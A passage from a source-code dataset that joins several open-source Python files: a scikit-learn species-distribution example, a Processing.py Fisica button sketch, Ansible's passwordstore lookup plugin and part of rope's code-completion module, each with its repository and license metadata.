190:231-259, 2006.
"""
# Authors: Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Jake Vanderplas <vanderplas@astro.washington.edu>
#
# License: BSD 3 clause
from __future__ import print_function
from time import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets.base import Bunch
from sklearn.datasets import fetch_species_distributions
from sklearn.datasets.species_distributions import construct_grids
from sklearn import svm, metrics
# if basemap is available, we'll use it.
# otherwise, we'll improvise later...
try:
from mpl_toolkits.basemap import Basemap
basemap = True
except ImportError:
basemap = False
print(__doc__)
def create_species_bunch(species_name, train, test, coverages, xgrid, ygrid):
"""Create a bunch with information about a particular organism
This will use the test/train record arrays to extract the
data specific to the given species name.
"""
bunch = Bunch(name=' '.join(species_name.split("_")[:2]))
species_name = species_name.encode('ascii')
points = dict(test=test, train=train)
for label, pts in points.items():
# choose points associated with the desired species
pts = pts[pts['species'] == species_name]
bunch['pts_%s' % label] = pts
# determine coverage values for each of the training & testing points
ix = np.searchsorted(xgrid, pts['dd long'])
iy = np.searchsorted(ygrid, pts['dd lat'])
bunch['cov_%s' % label] = coverages[:, -iy, ix].T
return bunch
def plot_species_distribution(species=("bradypus_variegatus_0",
"microryzomys_minutus_0")):
"""
Plot the species distribution.
"""
if len(species) > 2:
print("Note: when more than two species are provided,"
" only the first two will be used")
t0 = time()
# Load the compressed data
data = fetch_species_distributions()
# Set up the data grid
xgrid, ygrid = construct_grids(data)
# The grid in x,y coordinates
X, Y = np.meshgrid(xgrid, ygrid[::-1])
# create a bunch for each species
BV_bunch = create_species_bunch(species[0],
data.train, data.test,
data.coverages, xgrid, ygrid)
MM_bunch = create_species_bunch(species[1],
data.train, data.test,
data.coverages, xgrid, ygrid)
# background points (grid coordinates) for evaluation
np.random.seed(13)
background_points = np.c_[np.random.randint(low=0, high=data.Ny,
size=10000),
np.random.randint(low=0, high=data.Nx,
size=10000)].T
# We'll make use of the fact that coverages[6] has measurements at all
# land points. This will help us decide between land and water.
land_reference = data.coverages[6]
# Fit, predict, and plot for each species.
for i, species in enumerate([BV_bunch, MM_bunch]):
print("_" * 80)
print("Modeling distribution of species '%s'" % species.name)
# Standardize features
mean = species.cov_train.mean(axis=0)
std = species.cov_train.std(axis=0)
train_cover_std = (species.cov_train - mean) / std
# Fit OneClassSVM
print(" - fit OneClassSVM ... ", end='')
clf = svm.OneClassSVM(nu=0.1, kernel="rbf", gamma=0.5)
clf.fit(train_cover_std)
print("done.")
# Plot map of South America
plt.subplot(1, 2, i + 1)
if basemap:
print(" - plot coastlines using basemap")
m = Basemap(projection='cyl', llcrnrlat=Y.min(),
urcrnrlat=Y.max(), llcrnrlon=X.min(),
urcrnrlon=X.max(), resolution='c')
m.drawcoastlines()
m.drawcountries()
else:
print(" - plot coastlines from coverage")
plt.contour(X, Y, land_reference,
levels=[-9999], colors="k",
linestyles="solid")
plt.xticks([])
plt.yticks([])
print(" - predict species distribution")
# Predict species distribution using the training data
Z = np.ones((data.Ny, data.Nx), dtype=np.float64)
# We'll predict only for the land points.
idx = np.where(land_reference > -9999)
coverages_land = data.coverages[:, idx[0], idx[1]].T
pred = clf.decision_function((coverages_land - mean) / std)[:, 0]
Z *= pred.min()
Z[idx[0], idx[1]] = pred
levels = np.linspace(Z.min(), Z.max(), 25)
Z[land_reference == -9999] = -9999
# plot contours of the prediction
plt.contourf(X, Y, Z, levels=levels, cmap=plt.cm.Reds)
plt.colorbar(format='%.2f')
# scatter training/testing points
plt.scatter(species.pts_train['dd long'], species.pts_train['dd lat'],
s=2 ** 2, c='black',
marker='^', label='train')
plt.scatter(species.pts_test['dd long'], species.pts_test['dd lat'],
s=2 ** 2, c='black',
marker='x', label='test')
plt.legend()
plt.title(species.name)
plt.axis('equal')
# Compute AUC with regards to background points
pred_background = Z[background_points[0], background_points[1]]
pred_test = clf.decision_function((species.cov_test - mean)
/ std)[:, 0]
scores = np.r_[pred_test, pred_background]
y = np.r_[np.ones(pred_test.shape), np.zeros(pred_background.shape)]
fpr, tpr, thresholds = metrics.roc_curve(y, scores)
roc_auc = metrics.auc(fpr, tpr)
plt.text(-35, -70, "AUC: %.3f" % roc_auc, ha="right")
print("\n Area under the ROC curve : %f" % roc_auc)
print("\ntime elapsed: %.2fs" % (time() - t0))
plot_species_distribution()
plt.show()
| bsd-3-clause |
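The species-distribution example above scores held-out test points against random background points and reports the area under the ROC curve via `metrics.roc_curve` and `metrics.auc`. The same number can be computed without scikit-learn through the rank-sum (Mann-Whitney) identity; a minimal pure-Python sketch of that equivalence, illustrative only:

```python
def auc_rank(pos_scores, neg_scores):
    """AUC as the probability that a randomly drawn positive outscores a
    randomly drawn negative, counting ties as one half
    (Mann-Whitney U divided by n_pos * n_neg)."""
    wins = 0.0
    for p in pos_scores:
        for n in neg_scores:
            if p > n:
                wins += 1.0
            elif p == n:
                wins += 0.5
    return wins / (len(pos_scores) * len(neg_scores))
```

With perfectly separated scores this returns 1.0; with the labels reversed, 0.0. The O(n_pos * n_neg) double loop is fine for a sketch but a sort-based ranking is preferable at the 10000-background-point scale the example uses.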
tildebyte/processing.py | examples.py/Fisica/buttons.py | 5 | 2754 | """
* Buttons and bodies
*
* by Ricard Marxer
*
* This example shows how to create bodies.
* It also demonstrates the use of bodies as buttons.
"""
from fisica import Fisica, FWorld, FBox, FCircle, FPoly
boxButton = None
circleButton = None
polyButton = None
world = None
buttonColor = color(0x15, 0x5A, 0xAD)
hoverColor = color(0x55, 0xAA, 0x11)
bodyColor = color(0x6E, 0x05, 0x95)
def setup():
global boxButton, circleButton, polyButton, world
size(400, 400)
smooth()
Fisica.init(this)
world = FWorld()
world.setEdges()
world.remove(world.left)
world.remove(world.right)
world.remove(world.top)
boxButton = FBox(40, 40)
boxButton.setPosition(width/4, 100)
boxButton.setStatic(True)
boxButton.setFillColor(buttonColor)
boxButton.setNoStroke()
world.add(boxButton)
circleButton = FCircle(40)
circleButton.setPosition(2*width/4, 100)
circleButton.setStatic(True)
circleButton.setFillColor(buttonColor)
circleButton.setNoStroke()
world.add(circleButton)
polyButton = FPoly()
polyButton.vertex(20, 20)
polyButton.vertex(-20, 20)
polyButton.vertex(0, -20)
polyButton.setPosition(3*width/4, 100)
polyButton.setStatic(True)
polyButton.setFillColor(buttonColor)
polyButton.setNoStroke()
world.add(polyButton)
def draw():
background(255)
world.step()
world.draw()
def mousePressed():
pressed = world.getBody(mouseX, mouseY)
if pressed == boxButton:
myBox = FBox(40, 40)
myBox.setPosition(width/4, 200)
myBox.setRotation(random(TWO_PI))
myBox.setVelocity(0, 200)
myBox.setFillColor(bodyColor)
myBox.setNoStroke()
world.add(myBox)
elif pressed == circleButton:
myCircle = FCircle(40)
myCircle.setPosition(2*width/4, 200)
myCircle.setRotation(random(TWO_PI))
myCircle.setVelocity(0, 200)
myCircle.setFillColor(bodyColor)
myCircle.setNoStroke()
world.add(myCircle)
elif pressed == polyButton:
myPoly = FPoly()
myPoly.vertex(20, 20)
myPoly.vertex(-20, 20)
myPoly.vertex(0, -20)
myPoly.setPosition(3*width/4, 200)
myPoly.setRotation(random(TWO_PI))
myPoly.setVelocity(0, 200)
myPoly.setFillColor(bodyColor)
myPoly.setNoStroke()
world.add(myPoly)
def mouseMoved():
hovered = world.getBody(mouseX, mouseY)
if hovered in (boxButton, circleButton, polyButton):
hovered.setFillColor(hoverColor)
else:
boxButton.setFillColor(buttonColor)
circleButton.setFillColor(buttonColor)
polyButton.setFillColor(buttonColor)
def keyPressed():
saveFrame("screenshot.png")
| apache-2.0 |
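The button pattern in the Fisica sketch above hinges on `world.getBody(mouseX, mouseY)` returning whichever body lies under the cursor. A framework-free sketch of that hit-testing idea for axis-aligned boxes and circles (these shape classes are hypothetical stand-ins, not the Fisica API):

```python
class Box(object):
    def __init__(self, cx, cy, w, h):
        self.cx, self.cy, self.w, self.h = cx, cy, w, h

    def contains(self, x, y):
        # Inside if within half-extents of the center on both axes.
        return (abs(x - self.cx) <= self.w / 2.0 and
                abs(y - self.cy) <= self.h / 2.0)


class Circle(object):
    def __init__(self, cx, cy, diameter):
        self.cx, self.cy, self.r = cx, cy, diameter / 2.0

    def contains(self, x, y):
        # Inside if squared distance to center is within squared radius.
        return (x - self.cx) ** 2 + (y - self.cy) ** 2 <= self.r ** 2


def get_body(shapes, x, y):
    """Return the first shape under (x, y), or None -- the role that
    world.getBody() plays for the buttons in the sketch."""
    for shape in shapes:
        if shape.contains(x, y):
            return shape
    return None
```

Dispatching on the returned object, as `mousePressed()` does with `pressed == boxButton`, then selects which body to spawn.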
jnerin/ansible | lib/ansible/plugins/lookup/passwordstore.py | 16 | 10116 | # (c) 2017, Patrick Deelman <patrick@patrickdeelman.nl>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
lookup: passwordstore
version_added: "2.3"
author:
- Patrick Deelman <patrick@patrickdeelman.nl>
short_description: manage passwords with passwordstore.org's pass utility
description:
- Enables Ansible to retrieve, create or update passwords from the passwordstore.org pass utility.
It also retrieves YAML style keys stored as multilines in the passwordfile.
options:
_terms:
description: query key
required: True
passwordstore:
description: location of the password store
default: '~/.password-store'
directory:
description: directory of the password store
default: null
env:
- name: PASSWORD_STORE_DIR
create:
description: flag to create the password
type: boolean
default: False
overwrite:
description: flag to overwrite the password
type: boolean
default: False
returnall:
description: flag to return all the contents of the password store
type: boolean
default: False
subkey:
description: subkey to return
default: password
userpass:
description: user password
length:
description: password length
type: integer
default: 16
"""
EXAMPLES = """
# Debug is used for examples, BAD IDEA to show passwords on screen
- name: Basic lookup. Fails if example/test doesn't exist
debug: msg="{{ lookup('passwordstore', 'example/test')}}"
- name: Create pass with random 16 character password. If password exists just give the password
debug: var=mypassword
vars:
mypassword: "{{ lookup('passwordstore', 'example/test create=true')}}"
- name: Different size password
debug: msg="{{ lookup('passwordstore', 'example/test create=true length=42')}}"
- name: Create password and overwrite the password if it exists. As a bonus, this module includes the old password inside the pass file
debug: msg="{{ lookup('passwordstore', 'example/test create=true overwrite=true')}}"
- name: Return the value for user in the KV pair user, username
debug: msg="{{ lookup('passwordstore', 'example/test subkey=user')}}"
- name: Return the entire password file content
set_fact: passfilecontent="{{ lookup('passwordstore', 'example/test returnall=true')}}"
"""
RETURN = """
_raw:
description:
- a password
"""
import os
import subprocess
import time
from distutils import util
from ansible.errors import AnsibleError, AnsibleAssertionError
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.utils.encrypt import random_password
from ansible.plugins.lookup import LookupBase
# backhacked check_output with input for python 2.7
# http://stackoverflow.com/questions/10103551/passing-data-to-subprocess-check-output
def check_output2(*popenargs, **kwargs):
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
if 'stderr' in kwargs:
raise ValueError('stderr argument not allowed, it will be overridden.')
if 'input' in kwargs:
if 'stdin' in kwargs:
raise ValueError('stdin and input arguments may not both be used.')
b_inputdata = to_bytes(kwargs['input'], errors='surrogate_or_strict')
del kwargs['input']
kwargs['stdin'] = subprocess.PIPE
else:
b_inputdata = None
process = subprocess.Popen(*popenargs, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)
try:
b_out, b_err = process.communicate(b_inputdata)
except:
process.kill()
process.wait()
raise
retcode = process.poll()
if retcode != 0 or \
b'encryption failed: Unusable public key' in b_out or \
b'encryption failed: Unusable public key' in b_err:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(
retcode,
cmd,
to_native(b_out + b_err, errors='surrogate_or_strict')
)
return b_out
class LookupModule(LookupBase):
def parse_params(self, term):
# I went with the "traditional" param followed with space separated KV pairs.
# Waiting for final implementation of lookup parameter parsing.
# See: https://github.com/ansible/ansible/issues/12255
params = term.split()
if len(params) > 0:
# the first param is the pass-name
self.passname = params[0]
# next parse the optional parameters in keyvalue pairs
try:
for param in params[1:]:
name, value = param.split('=')
if name not in self.paramvals:
raise AnsibleAssertionError('%s not in paramvals' % name)
self.paramvals[name] = value
except (ValueError, AssertionError) as e:
raise AnsibleError(e)
# check and convert values
try:
for key in ['create', 'returnall', 'overwrite']:
if not isinstance(self.paramvals[key], bool):
self.paramvals[key] = util.strtobool(self.paramvals[key])
except (ValueError, AssertionError) as e:
raise AnsibleError(e)
if not isinstance(self.paramvals['length'], int):
if self.paramvals['length'].isdigit():
self.paramvals['length'] = int(self.paramvals['length'])
else:
raise AnsibleError("{0} is not a correct value for length".format(self.paramvals['length']))
# Set PASSWORD_STORE_DIR if directory is set
if self.paramvals['directory']:
if os.path.isdir(self.paramvals['directory']):
os.environ['PASSWORD_STORE_DIR'] = self.paramvals['directory']
else:
raise AnsibleError('Passwordstore directory \'{0}\' does not exist'.format(self.paramvals['directory']))
def check_pass(self):
try:
self.passoutput = to_text(
check_output2(["pass", self.passname]),
errors='surrogate_or_strict'
).splitlines()
self.password = self.passoutput[0]
self.passdict = {}
for line in self.passoutput[1:]:
if ':' in line:
name, value = line.split(':', 1)
self.passdict[name.strip()] = value.strip()
except (subprocess.CalledProcessError) as e:
if e.returncode == 1 and 'not in the password store' in e.output:
# if pass returns 1 and return string contains 'is not in the password store.'
# We need to determine if this is valid or Error.
if not self.paramvals['create']:
raise AnsibleError('passname: {0} not found, use create=True'.format(self.passname))
else:
return False
else:
raise AnsibleError(e)
return True
def get_newpass(self):
if self.paramvals['userpass']:
newpass = self.paramvals['userpass']
else:
newpass = random_password(length=self.paramvals['length'])
return newpass
def update_password(self):
# generate new password, insert old lines from current result and return new password
newpass = self.get_newpass()
datetime = time.strftime("%d/%m/%Y %H:%M:%S")
msg = newpass + '\n' + '\n'.join(self.passoutput[1:])
msg += "\nlookup_pass: old password was {0} (Updated on {1})\n".format(self.password, datetime)
try:
check_output2(['pass', 'insert', '-f', '-m', self.passname], input=msg)
except (subprocess.CalledProcessError) as e:
raise AnsibleError(e)
return newpass
def generate_password(self):
# generate new file and insert lookup_pass: Generated by Ansible on {date}
# use pwgen to generate the password and insert values with pass -m
newpass = self.get_newpass()
datetime = time.strftime("%d/%m/%Y %H:%M:%S")
msg = newpass + '\n' + "lookup_pass: First generated by ansible on {0}\n".format(datetime)
try:
check_output2(['pass', 'insert', '-f', '-m', self.passname], input=msg)
except (subprocess.CalledProcessError) as e:
raise AnsibleError(e)
return newpass
def get_passresult(self):
if self.paramvals['returnall']:
return os.linesep.join(self.passoutput)
if self.paramvals['subkey'] == 'password':
return self.password
else:
if self.paramvals['subkey'] in self.passdict:
return self.passdict[self.paramvals['subkey']]
else:
return None
def run(self, terms, variables, **kwargs):
result = []
self.paramvals = {
'subkey': 'password',
'directory': variables.get('passwordstore'),
'create': False,
'returnall': False,
'overwrite': False,
'userpass': '',
'length': 16,
}
for term in terms:
self.parse_params(term) # parse the input into paramvals
if self.check_pass(): # password exists
if self.paramvals['overwrite'] and self.paramvals['subkey'] == 'password':
result.append(self.update_password())
else:
result.append(self.get_passresult())
else: # password does not exist
if self.paramvals['create']:
result.append(self.generate_password())
return result
| gpl-3.0 |
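The lookup plugin's `parse_params` treats the first whitespace-separated token of the term as the pass-name and every following token as a `key=value` pair, rejecting keys it does not know. A simplified standalone sketch of that convention (a hypothetical helper, not the plugin's actual API):

```python
def parse_lookup_term(term, defaults):
    """Split 'name key=value ...' into (passname, params dict).

    Unknown keys or malformed tokens raise ValueError, mirroring
    the plugin's strict parameter handling.
    """
    tokens = term.split()
    if not tokens:
        raise ValueError('empty lookup term')
    passname, params = tokens[0], dict(defaults)
    for token in tokens[1:]:
        name, sep, value = token.partition('=')
        if not sep or name not in defaults:
            raise ValueError('unrecognized parameter: %s' % token)
        params[name] = value
    return passname, params
```

Note the values come back as strings, just as in the plugin, which then coerces booleans and the integer `length` in a separate pass.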
hkupty/python-mode | pymode/libs2/rope/contrib/codeassist.py | 26 | 25440 | import keyword
import sys
import warnings
import rope.base.codeanalyze
import rope.base.evaluate
from rope.base import pyobjects, pyobjectsdef, pynames, builtins, exceptions, worder
from rope.base.codeanalyze import SourceLinesAdapter
from rope.contrib import fixsyntax
from rope.refactor import functionutils
def code_assist(project, source_code, offset, resource=None,
templates=None, maxfixes=1, later_locals=True):
"""Return python code completions as a list of `CodeAssistProposal`\s
`resource` is a `rope.base.resources.Resource` object. If
provided, relative imports are handled.
`maxfixes` is the maximum number of errors to fix if the code has
errors in it.
If `later_locals` is `False` names defined in this scope and after
this line is ignored.
"""
if templates is not None:
warnings.warn('Codeassist no longer supports templates',
DeprecationWarning, stacklevel=2)
assist = _PythonCodeAssist(
project, source_code, offset, resource=resource,
maxfixes=maxfixes, later_locals=later_locals)
return assist()
def starting_offset(source_code, offset):
"""Return the offset in which the completion should be inserted
Usually code assist proposals should be inserted like::
completion = proposal.name
result = (source_code[:starting_offset] +
completion + source_code[offset:])
Where starting_offset is the offset returned by this function.
"""
word_finder = worder.Worder(source_code, True)
expression, starting, starting_offset = \
word_finder.get_splitted_primary_before(offset)
return starting_offset
def get_doc(project, source_code, offset, resource=None, maxfixes=1):
"""Get the pydoc"""
fixer = fixsyntax.FixSyntax(project.pycore, source_code,
resource, maxfixes)
pymodule = fixer.get_pymodule()
pyname = fixer.pyname_at(offset)
if pyname is None:
return None
pyobject = pyname.get_object()
return PyDocExtractor().get_doc(pyobject)
def get_calltip(project, source_code, offset, resource=None,
maxfixes=1, ignore_unknown=False, remove_self=False):
"""Get the calltip of a function
The format of the returned string is
``module_name.holding_scope_names.function_name(arguments)``. For
classes `__init__()` and for normal objects `__call__()` function
is used.
Note that the offset is on the function itself *not* after the its
open parenthesis. (Actually it used to be the other way but it
was easily confused when string literals were involved. So I
decided it is better for it not to try to be too clever when it
cannot be clever enough). You can use a simple search like::
offset = source_code.rindex('(', 0, offset) - 1
to handle simple situations.
If `ignore_unknown` is `True`, `None` is returned for functions
without source-code like builtins and extensions.
If `remove_self` is `True`, the first parameter whose name is self
will be removed for methods.
"""
fixer = fixsyntax.FixSyntax(project.pycore, source_code,
resource, maxfixes)
pymodule = fixer.get_pymodule()
pyname = fixer.pyname_at(offset)
if pyname is None:
return None
pyobject = pyname.get_object()
return PyDocExtractor().get_calltip(pyobject, ignore_unknown, remove_self)
def get_definition_location(project, source_code, offset,
resource=None, maxfixes=1):
"""Return the definition location of the python name at `offset`
Return a (`rope.base.resources.Resource`, lineno) tuple. If no
`resource` is given and the definition is inside the same module,
the first element of the returned tuple would be `None`. If the
location cannot be determined ``(None, None)`` is returned.
"""
fixer = fixsyntax.FixSyntax(project.pycore, source_code,
resource, maxfixes)
pymodule = fixer.get_pymodule()
pyname = fixer.pyname_at(offset)
if pyname is not None:
module, lineno = pyname.get_definition_location()
if module is not None:
return module.get_module().get_resource(), lineno
return (None, None)
def find_occurrences(*args, **kwds):
import rope.contrib.findit
warnings.warn('Use `rope.contrib.findit.find_occurrences()` instead',
DeprecationWarning, stacklevel=2)
return rope.contrib.findit.find_occurrences(*args, **kwds)
class CompletionProposal(object):
"""A completion proposal
The `scope` instance variable shows where proposed name came from
and can be 'global', 'local', 'builtin', 'attribute', 'keyword',
'imported', 'parameter_keyword'.
The `type` instance variable shows the approximate type of the
proposed object and can be 'instance', 'class', 'function', 'module',
and `None`.
All possible relations between proposal's `scope` and `type` are shown
in the table below (different scopes in rows and types in columns):
| instance | class | function | module | None
local | + | + | + | + |
global | + | + | + | + |
builtin | + | + | + | |
attribute | + | + | + | + |
imported | + | + | + | + |
keyword | | | | | +
parameter_keyword | | | | | +
"""
def __init__(self, name, scope, pyname=None):
self.name = name
self.pyname = pyname
self.scope = self._get_scope(scope)
def __str__(self):
return '%s (%s, %s)' % (self.name, self.scope, self.type)
def __repr__(self):
return str(self)
@property
def parameters(self):
"""The names of the parameters the function takes.
Returns None if this completion is not a function.
"""
pyname = self.pyname
if isinstance(pyname, pynames.ImportedName):
pyname = pyname._get_imported_pyname()
if isinstance(pyname, pynames.DefinedName):
pyobject = pyname.get_object()
if isinstance(pyobject, pyobjects.AbstractFunction):
return pyobject.get_param_names()
@property
def type(self):
pyname = self.pyname
if isinstance(pyname, builtins.BuiltinName):
pyobject = pyname.get_object()
if isinstance(pyobject, builtins.BuiltinFunction):
return 'function'
elif isinstance(pyobject, builtins.BuiltinClass):
clsobj = pyobject.builtin
return 'class'
elif isinstance(pyobject, builtins.BuiltinObject) or \
isinstance(pyobject, builtins.BuiltinName):
return 'instance'
elif isinstance(pyname, pynames.ImportedModule):
return 'module'
elif isinstance(pyname, pynames.ImportedName) or \
isinstance(pyname, pynames.DefinedName):
pyobject = pyname.get_object()
if isinstance(pyobject, pyobjects.AbstractFunction):
return 'function'
if isinstance(pyobject, pyobjects.AbstractClass):
return 'class'
return 'instance'
def _get_scope(self, scope):
if isinstance(self.pyname, builtins.BuiltinName):
return 'builtin'
if isinstance(self.pyname, pynames.ImportedModule) or \
isinstance(self.pyname, pynames.ImportedName):
return 'imported'
return scope
def get_doc(self):
"""Get the proposed object's docstring.
Returns None if it can not be get.
"""
if not self.pyname:
return None
pyobject = self.pyname.get_object()
if not hasattr(pyobject, 'get_doc'):
return None
return self.pyname.get_object().get_doc()
@property
def kind(self):
warnings.warn("the proposal's `kind` property is deprecated, " \
"use `scope` instead")
return self.scope
# leaved for backward compatibility
CodeAssistProposal = CompletionProposal
class NamedParamProposal(CompletionProposal):
"""A parameter keyword completion proposal
Holds reference to ``_function`` -- the function which
parameter ``name`` belongs to. This allows to determine
default value for this parameter.
"""
def __init__(self, name, function):
self.argname = name
name = '%s=' % name
super(NamedParamProposal, self).__init__(name, 'parameter_keyword')
self._function = function
def get_default(self):
"""Get a string representation of a param's default value.
Returns None if there is no default value for this param.
"""
definfo = functionutils.DefinitionInfo.read(self._function)
for arg, default in definfo.args_with_defaults:
if self.argname == arg:
return default
return None
def sorted_proposals(proposals, scopepref=None, typepref=None):
"""Sort a list of proposals
Return a sorted list of the given `CodeAssistProposal`\s.
`scopepref` can be a list of proposal scopes. Defaults to
``['parameter_keyword', 'local', 'global', 'imported',
'attribute', 'builtin', 'keyword']``.
`typepref` can be a list of proposal types. Defaults to
``['class', 'function', 'instance', 'module', None]``.
(`None` stands for completions with no type like keywords.)
"""
sorter = _ProposalSorter(proposals, scopepref, typepref)
return sorter.get_sorted_proposal_list()
def starting_expression(source_code, offset):
"""Return the expression to complete"""
word_finder = worder.Worder(source_code, True)
expression, starting, starting_offset = \
word_finder.get_splitted_primary_before(offset)
if expression:
return expression + '.' + starting
return starting
def default_templates():
warnings.warn('default_templates() is deprecated.',
DeprecationWarning, stacklevel=2)
return {}
class _PythonCodeAssist(object):
def __init__(self, project, source_code, offset, resource=None,
maxfixes=1, later_locals=True):
self.project = project
self.pycore = self.project.pycore
self.code = source_code
self.resource = resource
self.maxfixes = maxfixes
self.later_locals = later_locals
self.word_finder = worder.Worder(source_code, True)
self.expression, self.starting, self.offset = \
self.word_finder.get_splitted_primary_before(offset)
keywords = keyword.kwlist
def _find_starting_offset(self, source_code, offset):
current_offset = offset - 1
while current_offset >= 0 and (source_code[current_offset].isalnum() or
source_code[current_offset] in '_'):
            current_offset -= 1
return current_offset + 1
def _matching_keywords(self, starting):
result = []
for kw in self.keywords:
if kw.startswith(starting):
result.append(CompletionProposal(kw, 'keyword'))
return result
def __call__(self):
if self.offset > len(self.code):
return []
completions = list(self._code_completions().values())
if self.expression.strip() == '' and self.starting.strip() != '':
completions.extend(self._matching_keywords(self.starting))
return completions
def _dotted_completions(self, module_scope, holding_scope):
result = {}
found_pyname = rope.base.evaluate.eval_str(holding_scope,
self.expression)
if found_pyname is not None:
element = found_pyname.get_object()
compl_scope = 'attribute'
if isinstance(element, (pyobjectsdef.PyModule,
pyobjectsdef.PyPackage)):
compl_scope = 'imported'
for name, pyname in element.get_attributes().items():
if name.startswith(self.starting):
result[name] = CompletionProposal(name, compl_scope, pyname)
return result
def _undotted_completions(self, scope, result, lineno=None):
if scope.parent is not None:
self._undotted_completions(scope.parent, result)
if lineno is None:
names = scope.get_propagated_names()
else:
names = scope.get_names()
for name, pyname in names.items():
if name.startswith(self.starting):
compl_scope = 'local'
if scope.get_kind() == 'Module':
compl_scope = 'global'
if lineno is None or self.later_locals or \
not self._is_defined_after(scope, pyname, lineno):
result[name] = CompletionProposal(name, compl_scope,
pyname)
def _from_import_completions(self, pymodule):
module_name = self.word_finder.get_from_module(self.offset)
if module_name is None:
return {}
pymodule = self._find_module(pymodule, module_name)
result = {}
for name in pymodule:
if name.startswith(self.starting):
result[name] = CompletionProposal(name, scope='global',
pyname=pymodule[name])
return result
def _find_module(self, pymodule, module_name):
dots = 0
while module_name[dots] == '.':
dots += 1
pyname = pynames.ImportedModule(pymodule,
module_name[dots:], dots)
return pyname.get_object()
def _is_defined_after(self, scope, pyname, lineno):
location = pyname.get_definition_location()
if location is not None and location[1] is not None:
if location[0] == scope.pyobject.get_module() and \
lineno <= location[1] <= scope.get_end():
return True
def _code_completions(self):
lineno = self.code.count('\n', 0, self.offset) + 1
fixer = fixsyntax.FixSyntax(self.pycore, self.code,
self.resource, self.maxfixes)
pymodule = fixer.get_pymodule()
module_scope = pymodule.get_scope()
code = pymodule.source_code
lines = code.split('\n')
result = {}
start = fixsyntax._logical_start(lines, lineno)
indents = fixsyntax._get_line_indents(lines[start - 1])
inner_scope = module_scope.get_inner_scope_for_line(start, indents)
if self.word_finder.is_a_name_after_from_import(self.offset):
return self._from_import_completions(pymodule)
if self.expression.strip() != '':
result.update(self._dotted_completions(module_scope, inner_scope))
else:
result.update(self._keyword_parameters(module_scope.pyobject,
inner_scope))
self._undotted_completions(inner_scope, result, lineno=lineno)
return result
def _keyword_parameters(self, pymodule, scope):
offset = self.offset
if offset == 0:
return {}
word_finder = worder.Worder(self.code, True)
lines = SourceLinesAdapter(self.code)
lineno = lines.get_line_number(offset)
if word_finder.is_on_function_call_keyword(offset - 1):
name_finder = rope.base.evaluate.ScopeNameFinder(pymodule)
function_parens = word_finder.\
find_parens_start_from_inside(offset - 1)
primary = word_finder.get_primary_at(function_parens - 1)
try:
function_pyname = rope.base.evaluate.\
eval_str(scope, primary)
except exceptions.BadIdentifierError:
return {}
if function_pyname is not None:
pyobject = function_pyname.get_object()
if isinstance(pyobject, pyobjects.AbstractFunction):
pass
elif isinstance(pyobject, pyobjects.AbstractClass) and \
'__init__' in pyobject:
pyobject = pyobject['__init__'].get_object()
elif '__call__' in pyobject:
pyobject = pyobject['__call__'].get_object()
if isinstance(pyobject, pyobjects.AbstractFunction):
param_names = []
param_names.extend(
pyobject.get_param_names(special_args=False))
result = {}
for name in param_names:
if name.startswith(self.starting):
result[name + '='] = NamedParamProposal(
name, pyobject
)
return result
return {}
class _ProposalSorter(object):
"""Sort a list of code assist proposals"""
def __init__(self, code_assist_proposals, scopepref=None, typepref=None):
self.proposals = code_assist_proposals
if scopepref is None:
scopepref = ['parameter_keyword', 'local', 'global', 'imported',
'attribute', 'builtin', 'keyword']
self.scopepref = scopepref
if typepref is None:
typepref = ['class', 'function', 'instance', 'module', None]
self.typerank = dict((type, index)
for index, type in enumerate(typepref))
def get_sorted_proposal_list(self):
"""Return a list of `CodeAssistProposal`"""
proposals = {}
for proposal in self.proposals:
proposals.setdefault(proposal.scope, []).append(proposal)
result = []
for scope in self.scopepref:
scope_proposals = proposals.get(scope, [])
scope_proposals = [proposal for proposal in scope_proposals
if proposal.type in self.typerank]
scope_proposals.sort(self._proposal_cmp)
result.extend(scope_proposals)
return result
def _proposal_cmp(self, proposal1, proposal2):
if proposal1.type != proposal2.type:
return cmp(self.typerank.get(proposal1.type, 100),
self.typerank.get(proposal2.type, 100))
return self._compare_underlined_names(proposal1.name,
proposal2.name)
def _compare_underlined_names(self, name1, name2):
def underline_count(name):
result = 0
while result < len(name) and name[result] == '_':
result += 1
return result
underline_count1 = underline_count(name1)
underline_count2 = underline_count(name2)
if underline_count1 != underline_count2:
return cmp(underline_count1, underline_count2)
return cmp(name1, name2)
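The `cmp`-based comparison above ranks names by their number of leading underscores and then alphabetically; in Python 3, where `cmp` is gone, the same ordering is expressed as a sort key. A minimal sketch with hypothetical names and sample data:

```python
def underline_count(name):
    """Count leading underscores, as in _compare_underlined_names."""
    count = 0
    while count < len(name) and name[count] == '_':
        count += 1
    return count

def proposal_sort_key(name):
    # Fewer leading underscores sort first; ties break alphabetically.
    return (underline_count(name), name)

names = ['__all__', 'open', '_private', 'close']
print(sorted(names, key=proposal_sort_key))
# ['close', 'open', '_private', '__all__']
```

Public names surface before "private" `_`-prefixed ones, which is the behavior the proposal sorter wants for completion lists.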
class PyDocExtractor(object):
def get_doc(self, pyobject):
if isinstance(pyobject, pyobjects.AbstractFunction):
return self._get_function_docstring(pyobject)
elif isinstance(pyobject, pyobjects.AbstractClass):
return self._get_class_docstring(pyobject)
elif isinstance(pyobject, pyobjects.AbstractModule):
return self._trim_docstring(pyobject.get_doc())
return None
def get_calltip(self, pyobject, ignore_unknown=False, remove_self=False):
try:
if isinstance(pyobject, pyobjects.AbstractClass):
pyobject = pyobject['__init__'].get_object()
if not isinstance(pyobject, pyobjects.AbstractFunction):
pyobject = pyobject['__call__'].get_object()
except exceptions.AttributeNotFoundError:
return None
if ignore_unknown and not isinstance(pyobject, pyobjects.PyFunction):
return
if isinstance(pyobject, pyobjects.AbstractFunction):
result = self._get_function_signature(pyobject, add_module=True)
if remove_self and self._is_method(pyobject):
return result.replace('(self)', '()').replace('(self, ', '(')
return result
def _get_class_docstring(self, pyclass):
contents = self._trim_docstring(pyclass.get_doc(), 2)
supers = [sup.get_name() for sup in pyclass.get_superclasses()]
doc = 'class %s(%s):\n\n' % (pyclass.get_name(), ', '.join(supers)) + contents
if '__init__' in pyclass:
